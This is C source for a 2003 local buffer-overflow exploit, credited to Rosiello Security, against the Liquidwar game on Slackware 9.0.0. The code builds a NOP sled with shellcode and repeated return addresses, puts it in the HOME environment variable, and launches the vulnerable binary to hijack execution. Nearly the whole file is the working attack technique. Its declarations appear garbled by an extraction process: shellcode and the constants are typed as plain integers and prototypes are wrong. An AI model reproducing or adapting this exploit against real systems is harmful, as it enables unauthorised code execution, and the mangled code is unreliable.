
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int LEN ;
 char NOP ;
 long RET ;
 int execl (char*,char*,int *) ;
 int fprintf (int ,char*,...) ;
 int memcpy (char*,int ,int) ;
 int setenv (char*,char*,int) ;
 int shellcode ;
 int stderr ;
 int strlen (int ) ;

int main()
{
        char buffer[LEN];
        long retaddr = RET;
        int i;


        fprintf(stderr, "\n(c) Rosiello Security 2003 - http://www.rosiello.org\n");
        fprintf(stderr, "Liquidwar's exploit for Slackware 9.0.0\n");
        fprintf(stderr, "by Angelo Rosiello - angelo@rosiello.org\n\n");
        fprintf(stderr, "using address 0x%lx\n",retaddr);

        for (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr;

        for (i=0;i<(LEN-strlen(shellcode)-50);i++) *(buffer+i) = NOP;

        memcpy(buffer+i,shellcode,strlen(shellcode));



        setenv("HOME", buffer, 1);
        execl("/usr/games/liquidwar","liquidwar",((void*)0));

        return 0;
}
